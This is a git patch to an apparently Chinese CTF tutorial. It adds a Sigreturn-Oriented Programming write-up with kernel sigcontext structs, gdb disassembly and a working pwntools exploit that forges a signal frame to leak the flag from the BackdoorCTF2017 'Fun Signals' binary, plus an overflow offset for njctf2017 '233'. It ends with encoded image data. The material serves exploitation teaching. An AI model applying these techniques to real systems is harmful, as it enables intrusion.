From c2edb62e77a76cc61d294d9b14e533c7cca7901e Mon Sep 17 00:00:00 2001 From: firmianay Date: Tue, 21 Nov 2017 17:11:08 +0800 Subject: [PATCH] update 6.4 --- doc/5.2_pin.md | 28 +-- doc/6.2_pwn_njctf2017_pingme.md | 2 +- doc/6.4_pwn_njctf2017_233.md | 197 +++++++++++++++++- pic/6.4_signal.png | Bin 0 -> 46321 bytes .../6.4_pwn_njctf2017_233/exp_funsignals.py | 19 ++ .../funsignals_player_bin | Bin 0 -> 4848 bytes src/writeup/6.4_pwn_njctf2017_233/run.sh | 2 +- 7 files changed, 231 insertions(+), 17 deletions(-) create mode 100644 pic/6.4_signal.png create mode 100644 src/writeup/6.4_pwn_njctf2017_233/exp_funsignals.py create mode 100755 src/writeup/6.4_pwn_njctf2017_233/funsignals_player_bin diff --git a/doc/5.2_pin.md b/doc/5.2_pin.md index d36d44d..e1104ed 100644 --- a/doc/5.2_pin.md +++ b/doc/5.2_pin.md @@ -340,20 +340,20 @@ Pintool 的入口为 `main` 函数,通常需要完成下面的功能: #include #include void main() { - char pwd[] = "abc123"; - char str[128]; - int flag = 1; - scanf("%s", str); - for (int i=0; i<=strlen(pwd); i++) { - if (pwd[i]!=str[i] || str[i]=='\0'&&pwd[i]!='\0' || str[i]!='\0'&&pwd[i]=='\0') { - flag = 0; - } - } - if (flag==0) { - printf("Bad!\n"); - } else { - printf("Good!\n"); - } + char pwd[] = "abc123"; + char str[128]; + int flag = 1; + scanf("%s", str); + for (int i=0; i<=strlen(pwd); i++) { + if (pwd[i]!=str[i] || str[i]=='\0'&&pwd[i]!='\0' || str[i]!='\0'&&pwd[i]=='\0') { + flag = 0; + } + } + if (flag==0) { + printf("Bad!\n"); + } else { + printf("Good!\n"); + } } ``` 这段代码要求用户输入密码,然后逐字符进行判断。 diff --git a/doc/6.2_pwn_njctf2017_pingme.md b/doc/6.2_pwn_njctf2017_pingme.md index 2f7538c..d697bb4 100644 --- a/doc/6.2_pwn_njctf2017_pingme.md +++ b/doc/6.2_pwn_njctf2017_pingme.md @@ -17,7 +17,7 @@ No RELRO No canary found NX enabled No PIE No RPATH No RU ``` 关闭 ASLR,然后把程序运行起来: ``` -$ socat tcp4-listen:10001,reuseaddr,fork exec:./pingme +$ socat tcp4-listen:10001,reuseaddr,fork exec:./pingme & ``` diff --git a/doc/6.4_pwn_njctf2017_233.md b/doc/6.4_pwn_njctf2017_233.md index e695a0b..7176fd4 100644 --- a/doc/6.4_pwn_njctf2017_233.md +++ b/doc/6.4_pwn_njctf2017_233.md @@ -2,6 +2,10 @@ - [题目复现](#题目复现) - [SROP 原理及题目解析](#srop-原理及题目解析) + - [Linux 系统调用](#Linux 系统调用) + - [signal 机制](#signal-机制) + - [BackdoorCTF2017 Fun Signals](#backdoorctf2017-fun-signals) + - [njctf2017 233](#233) - [Exploit](#exploit) - [参考资料](#参考资料) @@ -17,11 +21,201 @@ Full RELRO No canary found NX enabled PIE enabled No RPATH No RU ``` 把程序运行起来: ``` -$ socat tcp4-listen:10001,reuseaddr,fork exec:./233 +$ socat tcp4-listen:10001,reuseaddr,fork exec:./233 & ``` ## SROP 原理及题目解析 +#### Linux 系统调用 +在开始这一切之前,我想先将一下 Linux 的系统调用。64 位和 32 位的系统调用表分别在 +`/usr/include/asm/unistd_64.h` 和 `/usr/include/asm/unistd_32.h` 中,另外还需要查看 `/usr/include/bits/syscall.h`。 + +一开始 Linux 是通过 `int 0x80` 中断的方式进入系统调用,它会先进行调用者特权级别的检查,然后进行压栈、跳转等操作,这无疑会浪费许多资源。从 Linux 2.6 开始,就出现了新的系统调用指令 `sysenter`/`sysexit`,前者用于从 Ring3 进入 Ring0,后者用于从 Ring0 返回 Ring3,它没有特权级别检查,也没有压栈的操作,所以执行速度更快。 + +#### signal 机制 + +![](../pic/6.4_signal.png) + +sigreturn frame 因架构不同而不同,在 Linux 中也有了新的定义,但目前关于 srop 的利用也都是基于旧的 sigcontext,所以这里还是给出旧定义,仅当用户空间依然依赖它时才会使用它们: +``` +# ifdef __i386__ +struct sigcontext { + __u16 gs, __gsh; + __u16 fs, __fsh; + __u16 es, __esh; + __u16 ds, __dsh; + __u32 edi; + __u32 esi; + __u32 ebp; + __u32 esp; + __u32 ebx; + __u32 edx; + __u32 ecx; + __u32 eax; + __u32 trapno; + __u32 err; + __u32 eip; + __u16 cs, __csh; + __u32 eflags; + __u32 esp_at_signal; + __u16 ss, __ssh; + struct _fpstate *fpstate; + __u32 oldmask; + __u32 cr2; +}; +# else /* __x86_64__: */ +struct sigcontext { + __u64 r8; + __u64 r9; + __u64 r10; + __u64 r11; + __u64 r12; + __u64 r13; + __u64 r14; + __u64 r15; + __u64 rdi; + __u64 rsi; + __u64 rbp; + __u64 rbx; + __u64 rdx; + __u64 rax; + __u64 rcx; + __u64 rsp; + __u64 rip; + __u64 eflags; /* RFLAGS */ + __u16 cs; + __u16 gs; + __u16 fs; + union { + __u16 ss; /* If UC_SIGCONTEXT_SS */ + __u16 __pad0; /* Alias name for old (!UC_SIGCONTEXT_SS) user-space */ + }; + __u64 err; + __u64 trapno; + __u64 oldmask; + __u64 cr2; + struct _fpstate *fpstate; /* Zero when no FPU context */ +# ifdef __ILP32__ + __u32 __fpstate_pad; +# endif + __u64 reserved1[8]; +}; +``` + +在你使用 `ldd` 命令时,通常也会显示 vDSO,如下: +``` +$ ldd /usr/bin/ls + linux-vdso.so.1 (0x00007ffff7ffa000) + libcap.so.2 => /usr/lib/libcap.so.2 (0x00007ffff79b2000) + libc.so.6 => /usr/lib/libc.so.6 (0x00007ffff75fa000) + /lib64/ld-linux-x86-64.so.2 => /usr/lib64/ld-linux-x86-64.so.2 (0x00007ffff7dd8000) +``` +32 位程序则会显示 `linux-gate.so.1`,都是一个意思。 + +#### BackdoorCTF2017 Fun Signals +我们先来看一个简单的例子,一个 64 位静态链接的 srop,可以说是什么都没开。。。 +``` +$ checksec -f funsignals_player_bin +RELRO STACK CANARY NX PIE RPATH RUNPATH FORTIFY Fortified Fortifiable FILE +No RELRO No canary found NX disabled No PIE No RPATH No RUNPATH No 0 0 funsignals_player_bin +``` +``` +gdb-peda$ disassemble _start +Dump of assembler code for function _start: + 0x0000000010000000 <+0>: xor eax,eax + 0x0000000010000002 <+2>: xor edi,edi + 0x0000000010000004 <+4>: xor edx,edx + 0x0000000010000006 <+6>: mov dh,0x4 + 0x0000000010000008 <+8>: mov rsi,rsp + 0x000000001000000b <+11>: syscall + 0x000000001000000d <+13>: xor edi,edi + 0x000000001000000f <+15>: push 0xf + 0x0000000010000011 <+17>: pop rax + 0x0000000010000012 <+18>: syscall + 0x0000000010000014 <+20>: int3 +End of assembler dump. +gdb-peda$ disassemble syscall +Dump of assembler code for function syscall: + 0x0000000010000015 <+0>: syscall + 0x0000000010000017 <+2>: xor rdi,rdi + 0x000000001000001a <+5>: mov rax,0x3c + 0x0000000010000021 <+12>: syscall +End of assembler dump. +gdb-peda$ x/s flag +0x10000023 : "fake_flag_here_as_original_is_at_server" +``` +而且 flag 就在二进制文件里,只不过是在服务器上的那个里面,过程是完全一样的。 + +首先可以看到 `_start` 函数里有两个 syscall。第一个是 `read(0, $rip, 0x400)`(调用号`0x0`),它从标准输入读取 `0x400` 个字节到 `rip` 指向的地址处,也就是栈上。第二个是 `sigreturn()`(调用号`0xf`),它将从栈上读取 sigreturn frame。所以我们就可以伪造一个 frame。 + +那么怎样读取 flag 呢,需要一个 `write(1, &flag, 50)`,调用号为 `0x1`,而函数 `syscall` 正好为我们提供了 `syscall` 指令,构造 payload 如下: +```python +from pwn import * + +elf = ELF('./funsignals_player_bin') +io = process('./funsignals_player_bin') +# io = remote('hack.bckdr.in', 9034) + +context.clear() +context.arch = "amd64" + +# Creating a custom frame +frame = SigreturnFrame() +frame.rax = constants.SYS_write +frame.rdi = constants.STDOUT_FILENO +frame.rsi = elf.symbols['flag'] +frame.rdx = 50 +frame.rip = elf.symbols['syscall'] + +io.send(str(frame)) +io.interactive() +``` +``` +$ python2 exp_funsignals.py +[*] '/home/firmy/Desktop/RE4B/srop/funsignals_player_bin' + Arch: amd64-64-little + RELRO: No RELRO + Stack: No canary found + NX: NX disabled + PIE: No PIE (0x10000000) + RWX: Has RWX segments +[+] Opening connection to 127.0.0.1 on port 10001: Done +[*] Switching to interactive mode +fake_flag_here_as_original_is_at_server\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00[*] Got EOF while reading in interactive +``` +如果连接的是远程服务器,`fake_flag_here_as_original_is_at_server` 会被替换成真正的 flag。 + +#### njctf2017 233 +这是一个 32 位的程序。 +``` +gdb-peda$ disassemble main +Dump of assembler code for function main: + 0x0000063b <+0>: push ebp + 0x0000063c <+1>: mov ebp,esp + 0x0000063e <+3>: push ebx + 0x0000063f <+4>: and esp,0xfffffff0 + 0x00000642 <+7>: sub esp,0x20 + 0x00000645 <+10>: call 0x510 <__x86.get_pc_thunk.bx> + 0x0000064a <+15>: add ebx,0x197e + 0x00000650 <+21>: mov DWORD PTR [esp+0x8],0x400 + 0x00000658 <+29>: lea eax,[esp+0x16] + 0x0000065c <+33>: mov DWORD PTR [esp+0x4],eax + 0x00000660 <+37>: mov DWORD PTR [esp],0x0 + 0x00000667 <+44>: call 0x480 + 0x0000066c <+49>: lea eax,[esp+0x16] + 0x00000670 <+53>: mov DWORD PTR [esp],eax + 0x00000673 <+56>: call 0x4c0 + 0x00000678 <+61>: mov ebx,DWORD PTR [ebp-0x4] + 0x0000067b <+64>: leave + 0x0000067c <+65>: ret +End of assembler dump. +``` +这个程序看起来很简单,就是使用 read 函数读取 `0x400` 个字节到 `[esp+0x16]` 的地方,然后将其传给 atoi。很明显的栈溢出: +``` +gdb-peda$ pattern_offset 0x41284141 +1093157185 found at offset: 22 +``` + ## Exploit 完整的 exp 如下,其他文件放在了[github](../src/writeup/6.4_pwn_njctf2017_233)相应文件夹中: @@ -31,3 +225,4 @@ $ socat tcp4-listen:10001,reuseaddr,fork exec:./233 - [Framing Signals—A Return to Portable Shellcode](http://www.ieee-security.org/TC/SP2014/papers/FramingSignals-AReturntoPortableShellcode.pdf) - [slides: Framing Signals a return to portable shellcode](https://tc.gtisc.gatech.edu/bss/2014/r/srop-slides.pdf) - [Sigreturn Oriented Programming](https://www.slideshare.net/AngelBoy1/sigreturn-ori) +- [Sigreturn Oriented Programming is a real Threat](https://subs.emis.de/LNI/Proceedings/Proceedings259/2077.pdf) diff --git a/pic/6.4_signal.png b/pic/6.4_signal.png new file mode 100644 index 0000000000000000000000000000000000000000..77c2c972648d26a10290a3953dec3f6aed3dbd1e GIT binary patch literal 46321 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 